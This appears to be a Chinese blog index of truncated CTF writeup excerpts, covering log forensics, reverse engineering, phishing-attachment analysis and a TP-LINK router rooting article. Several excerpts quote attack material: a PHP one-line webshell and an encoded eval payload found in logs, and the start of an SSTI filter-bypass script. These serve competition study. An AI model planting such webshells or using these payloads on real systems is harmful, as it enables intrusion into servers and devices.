【Volcania】软件系统安全赛 CCSSSC 2025 华南赛区区域线下赛复盘
吐槽话在前头:这是我们队第二次打线下赛,第一次是鹏城杯决赛,但是因为考虑到保密问题所以我没写复盘
喜欢我队友下载取证 5 个 G 的附件 20KB/s 剩余时间 3 天嘛?还是说,喜欢的是我根本就进不去比赛平台 ♪
笑死了,华南赛区这边刚开始根本就进不去平台,好不容易我们队四个有一个队友进去了,结果自己的账号密码忘记了先用的我的,后面说可以重置账号密码,上报后说重置完了(为统一的一个强密码),结果还是登不进去,这不是重置了个寂寞吗……最后一个队四个人三个人用我的号,剩下一个队友用自己的
还有还有,怎么有赛事主办方提供的附件(babymooer 的附件)对系统有要求啊(据说是 Win 10 22H2 测试通过),导致我们没有任何一个人能打开这个附件(附加调试器打开就蓝屏了)
还有还有还有,从早上八点半打到下午三点半,连饭都没得吃,饿死啦!!!(哭~~~~~~
比赛题目这次比赛共有 8 道题目,其中有 3 道 Web 题,一道 re 题,剩下的都是 MISC 题
题目列表在这里
题目名称
题目分类
题目描述
题目备注
babymooer
Reverse (驱动)
...
【Volcania】2025 数字创新中国大赛数字安全赛道时空数据安全赛题暨三明市第五届“红名谷”杯大赛初赛 Writeup
MISC异常行为溯源 | @Luminoria @Ron
某企业网络安全部门人员正在对企业网络资产受到的攻击行为进行溯源分析,该工作人员发现攻击者删除了一段时间内的访问日志数据,但是攻击者曾传输过已被删除的访问日志数据并且被流量监控设备捕获,工作人员对流量数据进行了初步过滤并提取出了相应数据包。已知该攻击者在开始时曾尝试低密度的攻击,发现未被相关安全人员及时发现后进行了连续多日的攻击,请协助企业排查并定位攻击者IP,flag格式为:flag{md5(IP)}
出现了三种协议:TCP、giFT 和 X11
只把 TCP 提取出来的 log 并不完整,缺少了很多东西,giFT 数据量太少且不具有参考价值
但是可以看到数据的格式
最开始是经过 Base64 编码的内容,例如
1eyJtc2ciOiJNemt1TVRrekxqWTJMakkwTlMwZ0xTQmJNRGd2U21GdUx6SXdNalU2TVRrNk5EUTZOVGtnS3pBd01EQmRJQ0pIUlZRZ0wyRndjQzlzYVhOMExuQm9jQ0JJVkZSUUx6RXVNU0lnTWpBd0lETTBOek1 ...
VNCTF2025 个人Writeup(垂死挣扎记录)
官方WP:http://ctf-files.bili33.top/VNCTF2025/VNCTF2025%20Official%20Writeup.pdf
[Reverse] Hook Fish
钓到的鱼怎么跑了?
下载下来一个apk文件,丢进jadx查看AndroidManifest.xml看到第一个Activity是com.example.hihitt.MainActivity
找到Activity看到里面有一些函数
123456789101112131415161718192021222324252627282930313233343536373839404142434445 public void loadClass(String input0) { String input1 = encode(input0); File dexFile = new File(getExternalFilesDir(Environment.DIRECTORY_DOWNLOADS), "hook_fish.dex"); ...
【Volcania】第八届西湖论剑·网络安全大会初赛Writeup
我猜你是那种下载文件夹里一堆“西湖论剑附件”,16:00的时候看着自己的排名发现自己论剑论了个寂寞的玩家
[DS] easydatalog | @Luminoria | 未出
请你对附件中的日志文件进行分析,找出“张三”的身份证号和手机号,譬如其身份证号是119795199308186673,手机号是73628276413,则提交的flag为“119795199308186673_73628276413”。
打开附件,发现error.log体积比较大,里面有很多的内容
204行发现一句话木马 <?php eval($_POST[1]);?>
252行及后面发现多行b64编码内容,且每个的内容不一样
1@eval(@base64_decode($_POST['lc134a7d99e04f']));&lc134a7d99e04f=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXI ...
【Volcania】2025软件系统安全赛华南赛区(CCSSSC2025)Writeup - TEAM Volcania
钓鱼邮件 | @Luminoria
Bob收到了一份钓鱼邮件,请找出木马的回连地址和端口。 假如回连地址和端口为123.213.123.123:1234,那么敏感信息为MD5(123.213.123.123:1234),即d9bdd0390849615555d1f75fa854b14f,以Cyberchef的结果为准。
附件是邮件的eml文件,处理一下,删除部分标记,可以得到附件部分的base64编码值,尝试赛博厨师解码,发现PK头
用Python处理,写成文件
1234567891011import base64with open("email.txt") as f: data = f.read().replace("\r\n", "") with open("raw.txt", "wt") as f: f.write(data)with open("file", "wb") as f: dec_data = base ...
【Volcania】2025 CISCN x 长城杯铁人三项 初赛Writeup
[WEB] Safe_Proxy | @RonSSTI题,用学校的祖传脚本一把梭
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899def generate_number(num:int): num_map = { 0:'([]|length)', 1:'([g]|length)', 5:'(()|select|string|wordcount)', 6:'(()|select|string|urlencode|wordcount)', 12:'([g,g,g]|wordcount) ...
2024年 GDUTCTF 个人WriteUp
日志分析
近日xxa集团的某终端遭到DNS劫持的恶意攻击,导致大量的服务器、应用、个人终端都无法正常的访问,请找出被劫持的服务器IP
打开后在Wireshark里面过滤器填写dns,过滤所有的DNS请求
然后随便拉一下就发现,有对外网DNS服务器进行查询的操作,这个IP是61.7.12.5,所以答案为flag{61.7.12.5}
RSA
yafu
题目说了用yafu,咱就上yafu呗
123456789101112131415161718192021> .\yafu-x64.exe "factor(5732964453789005656202220060994030976008462483974106949360656685503394408870148542074882576415254144726130307660083216338644162341371153570939410807509529736550955786833199064934462338627066079768583784202430670910414267735660 ...
ADCTF2024 个人Writeup
MISC[Easy] nolibc
坏了,刚刚不小心 把 libc 删掉了 ,输入什么都没用了,怎么办呜呜呜 T_T。
求求你惹,能不能帮我把一份重要文件 (指 flag) 拿出来,待会儿就要用惹xwx。
rkk是不是做了MoeCTF的那个题所以出了这个……
这题我直接把我MoeCTF的Payload拿过来用的,但是跟那个题目不一样的地方在于我们不知道flag在哪里,所以我先试试看看当前目录的东西
当然,没有libc,我们是用不了ls的,所以我用了echo *
得到flag的文件名为4La9-83c566f8,还是因为没有libc,所以没有cat,所以用while+read
1$ while IFS= read -r line; do echo "$line"; done < 4La9-83c566f8
然后就得到flag了
[Easy] py_jail连接题目得到源码
12345678910111213141516code = input('> ') + '\n'while True: _ = ...
中国科学技术大学第十一届信息安全大赛(Hackgame2024)个人题解Writeup
Web签到
让我们说……各种语言,开始今年的冒险!
提示输入不同语言的启动,从F12开发者工具复制一个进去发现不让粘贴,点击了底下的发现会传入URL的参数pass=false,改为true就得到flag了
flag为flag{WeLC0Me-7o-hACkErg@mE-AND-ENJOY-HAcKINg-Zo24}
喜欢做签到的 CTFer 你们好呀
喜欢做签到的 CTFer 你们好呀,我是一道更典型的 checkin:有两个 flag 就藏在中国科学技术大学校内 CTF 战队的招新主页里!
Checkin Again在网上冲浪可以找到这个网页 NebuTerm
输入help可以看到可用的命令,里面发现有env
输入env得到flag:flag{actually_theres_another_flag_here_trY_to_f1nD_1t_y0urself___join_us_ustc_nebula}
PaoluGPT
在大语言模型时代,几乎每个人都在和大语言模型聊天。小 Q 也想找一个方便使用的 GPT 服务,所以在熟人推荐下, ...
通过TP-LINK WAR308备份文件提取漏洞获得路由器root权限
Ref: https://herowong.org/archives/a-special-experience-of-hacking-tplink-router.html
我在之前就发过文章,解决了学校校园网的设备限制问题,但是R2S存在一个问题,就是它没有WIFI,而有的时候就是需要那么点WIFI。正巧,我从某些地方薅了一些淘汰下来的路由回来,它们分别是TP-LINK TL-WDR5620、Tenda AC5和TP-LINK TL-WAR308
而我的要求是路由器必须得能刷openwrt来修改UA(不然一样会触发设备限制),经过在网上的一顿搜索后,对于三个路由器的情况分别是这样的
TL-WDR5620:能刷,但是要拆机用编程器
Tenda AC5:Openwrt官方明确说明不支持
TL-WAR308:自带定制版openwrt,但是没有权限
在没有编程器的情况下,我选择对TL-WAR308下手,然后我又开始高强度网上冲浪,终于找到了能够获取root权限的方法
破解基础我手上这个路由器的系统版本是1.2.1 Build 20190117 Rel.51148,硬件版本是v3.0
...